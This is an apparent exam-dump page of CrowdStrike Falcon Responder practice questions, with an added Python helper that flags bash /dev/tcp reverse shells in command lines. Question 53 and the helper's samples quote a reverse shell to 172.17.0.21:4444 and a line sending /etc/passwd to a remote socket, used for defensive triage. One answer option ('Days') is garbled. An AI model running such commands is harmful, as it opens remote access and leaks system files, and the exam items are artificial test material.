
CCFR-201b Exam Dumps - CrowdStrike Certified Falcon Responder

Searching for workable clues to ace the CrowdStrike CCFR-201b exam? You're in the right place. ExamCert offers realistic, trusted and authentic exam prep tools to help you achieve your desired credential. ExamCert's CCFR-201b PDF Study Guide, Testing Engine and Exam Dumps follow a reliable exam preparation strategy, providing the most relevant and up-to-date study material in an easy-to-learn question-and-answer format. ExamCert's study tools aim to simplify the complex and confusing concepts of the exam and introduce you to the real exam scenario, which you can practice with the help of its testing engine and real exam dumps.

Question # 49

A responder has identified a suspicious PowerShell script executing on a domain controller. To perform a deep-dive forensic analysis of every action taken by that specific process—including network connections and file modifications—the analyst needs to pivot to a Process Timeline. What is the absolute minimum telemetry data required to generate this auto-filled view?

A.

Agent ID (AID) and Local IP Address

B.

Agent ID (AID) and Target Process ID (TargetProcessId_decimal)

C.

Hostname and MAC Address

D.

User SID and SHA256 Hash

Question # 50

If the Falcon sensor identifies suspicious behavioral patterns—such as a process attempting to dump memory from lsass.exe—what specific type of detection will be generated?

A.

Indicator of Compromise (IOC)

B.

Indicator of Attack (IOA)

C.

Known Malware Alert

D.

Intelligence Data Match

Question # 51

How long are quarantined files stored in the CrowdStrike Cloud?

A.

45 Days

B.

90 Days

C.

Days

D.

Quarantined files are not deleted

Question # 52

Aside from a Process Timeline or Event Search, how do you export process event data from a detection in .CSV format?

A.

You can't export detailed event data from a detection, you have to use the Process Timeline or an Event Search

B.

In Full Detection Details, you expand the nodes of the process tree you wish to expand and then click the "Export Process Events" button

C.

In Full Detection Details, you choose the "View Process Activity" option and then export from that view

D.

From the Detections Dashboard, you right-click the event type you wish to export and choose CSV, JSON or XML

Question # 53

Refer to the detection details below.

Command line:

/bin/bash -c sh -i >& /dev/tcp/172.17.0.21/4444 0>&1

File path:

/bin/bash

You receive a detection on the Bash process indicating the command line shown above.

Based on the command line, what is the next step you should take?

A.

Investigate the host for manipulation of the root folder

B.

Investigate the host for any Potentially Unwanted Programs (PUP)

C.

Investigate the host for an interactive remote terminal

D.

Investigate the host for developer activity

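The command line in this question is the textbook Bash reverse shell: `sh -i` starts an interactive shell, `>& /dev/tcp/HOST/PORT` sends its stdout and stderr to a socket that Bash opens through its /dev/tcp pseudo-device, and `0>&1` wires stdin to that same socket, giving the remote side a two-way terminal. The following Python triage helper is an added example, not part of the original exam material and not CrowdStrike's own tooling: it takes raw command lines (the kind you would export from a detection or Event Search), flags any use of /dev/tcp or /dev/udp, pulls out the remote endpoint to pivot on, and distinguishes a full interactive shell from a one-way redirection such as data exfiltration. The sample command lines are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Bash's pseudo-device that opens a socket: /dev/tcp/<host>/<port> (or udp).
DEV_SOCKET = re.compile(r"/dev/(?P<proto>tcp|udp)/(?P<host>[^/\s]+)/(?P<port>\d{1,5})")
# stdin wired to another descriptor (0>&1, 0<&1, 0<&5 ...): the channel is two-way.
STDIN_REDIRECT = re.compile(r"\b0\s*[<>]&\s*\d")
# An interactive shell invocation (sh -i, bash -i, ...).
INTERACTIVE_FLAG = re.compile(r"\b(?:sh|bash|ksh|zsh)\s+-i\b")


@dataclass
class ReverseShellHit:
    proto: str
    host: str
    port: int
    interactive: bool  # True = interactive remote terminal, False = one-way socket use


def normalize(cmdline: str) -> str:
    """Collapse whitespace inside redirection operators.

    Exported or screen-scraped command lines sometimes arrive as '> &' or
    '0 > & 1'; the shell itself treats these as '>&' and '0>&1'.
    """
    return re.sub(r"\s*([<>]+)\s*&\s*", r"\1&", cmdline)


def analyse_command_line(cmdline: str) -> Optional[ReverseShellHit]:
    """Return a ReverseShellHit if the command line opens a /dev/tcp or /dev/udp socket."""
    text = normalize(cmdline)
    m = DEV_SOCKET.search(text)
    if not m:
        return None
    # Interactive only if a shell is started with -i AND stdin is redirected to a descriptor;
    # a bare '> /dev/tcp/...' redirect moves data out but gives the peer no shell.
    interactive = bool(INTERACTIVE_FLAG.search(text) and STDIN_REDIRECT.search(text))
    return ReverseShellHit(m["proto"], m["host"], int(m["port"]), interactive)


# Constructed sample command lines: the one from the question plus benign and exfil variants.
SAMPLE_COMMAND_LINES = [
    "/bin/bash -c sh -i > & /dev/tcp/172.17.0.21/4444 0 > & 1",
    "/bin/bash -c ls -la /tmp",
    "cat /etc/passwd > /dev/tcp/10.0.0.5/9001",
    "/bin/bash -c tar czf /tmp/build.tgz /opt/app",
]


def triage(cmdlines: List[str]) -> List[Tuple[str, ReverseShellHit]]:
    """Run the check over many command lines; return only those that touched a socket device."""
    hits = []
    for cmd in cmdlines:
        hit = analyse_command_line(cmd)
        if hit is not None:
            hits.append((cmd, hit))
    return hits


if __name__ == "__main__":
    for cmd, hit in triage(SAMPLE_COMMAND_LINES):
        kind = "interactive remote terminal" if hit.interactive else "one-way socket redirect"
        print(f"{kind}: {hit.proto}://{hit.host}:{hit.port}  <-  {cmd}")
```

For the command line in the question the helper reports an interactive shell to 172.17.0.21:4444, which is the endpoint to pivot on: check for an established connection to that address from the host, look for the listening side on 172.17.0.21 if it is an internal system, and review what the interactive session did after the socket was opened.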
Question # 54

When analyzing an executable with a global prevalence of Common, but you do not know what the executable is, what is the best course of action?

A.

Do nothing, as this file is common and well known

B.

From detection, click the VT Hash button to pivot to VirusTotal to investigate further

C.

From detection, use API manager to create a custom blocklist

D.

From detection, submit to FalconX for deep dive analysis

Question # 55

Evaluate the following process tree observed in a detection:

root > smss.exe > winlogon.exe > userinit.exe > explorer.exe > windows_media_player_y35s21-4ak.exe

Based on the parent-child relationships, which entry source is most likely?

A.

A remote service exploitation targeting a system process.

B.

A phishing attack where the user executed a malicious file from the desktop.

C.

A scheduled task running under the SYSTEM account.

D.

A supply chain attack targeting the Windows Boot manager.

Question # 56

In the Hash Search tool, which of the following is listed under Process Executions?

A.

Operating System

B.

File Signature

C.

Command Line

D.

Sensor Version
